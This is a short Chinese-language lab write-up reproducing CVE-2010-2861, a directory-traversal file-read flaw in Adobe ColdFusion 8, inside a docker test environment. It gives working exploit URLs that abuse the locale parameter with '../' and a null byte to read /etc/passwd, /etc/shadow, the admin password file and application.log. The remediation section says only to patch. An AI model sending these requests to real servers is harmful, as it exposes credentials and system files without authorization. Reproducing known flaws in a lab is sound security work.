CVE-2010-2861(coldfusion-文件读取漏洞)
漏洞描述
- 漏洞编号:CVE-2010-2861
- 影响版本:Adobe CouldFusion 8.0.1版本
- 漏洞产生原因:
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
启动环境:docker-compose up -d
vulnIP:192.168.1.232
环境启动可能需要1~5分钟,启动后,访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。
输入密码admin,开始初始化整个环境。
漏洞发现
关注Adobe ColdFusion的版本
漏洞利用
访问
http://192.168.1.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
用burp截取,删除其中的cookie信息后,即可读取文件`/etc/passwd`:
也可读取文件/etc/shadow
读取后台管理员密码
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
利用application.log本地包含CFM的方法,首先看看application.log有没有在默认的目录:
http://192.168.1.232:8500//CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\logs\application.log%00en
问题汇总
修复方案
打补丁,升级到最新版本~
2021-01-16 21:15:08
